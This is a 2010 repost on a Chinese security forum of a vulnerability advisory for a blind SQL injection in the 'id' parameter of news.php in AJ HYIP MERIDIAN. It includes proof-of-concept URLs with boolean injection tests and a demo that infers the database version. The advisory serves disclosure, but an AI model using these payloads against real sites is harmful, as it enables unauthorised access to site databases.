首页
社区
课程
招聘
[转帖]AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability
发表于: 2010-7-23 05:53 3094

[转帖]AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability

2010-7-23 05:53
3094
AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability  

bug found by Jose Luis Gongora Fernandez (a.k.a) JosS  

   

contact: sys-project[at]hotmail.com  

website: http://www.hack0wn.com/  

   

- site: http://www.ajsquare.com/products/ajhyip/index.php  

   

- about AJ HYIP:  

   

AJ HYIP is a complete financial tool with no technical   

knowledge required to manage the site. AJ HYIP software   

is the latest and most advanced HYIP Script with excellent   

navigation features. Our HYIP Script can be easily customized   

to accustom your needs with a potential to generate heavy revenues.  

   

   

~~ [POC]  

   

http://target/path/news.php?id=1 [bSQL]  

http://target/path/news.php?id=1 and 1=1  

http://target/path/news.php?id=1 and 1=2  

   

~~ [DEMO]  

   

http://server/meridian/news.php?id=1 and substring(@@version,1,1)=4  

http://server/meridian/news.php?id=1 and substring(@@version,1,1)=5

[课程]FART 脱壳王!加量不加价!FART作者讲授!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//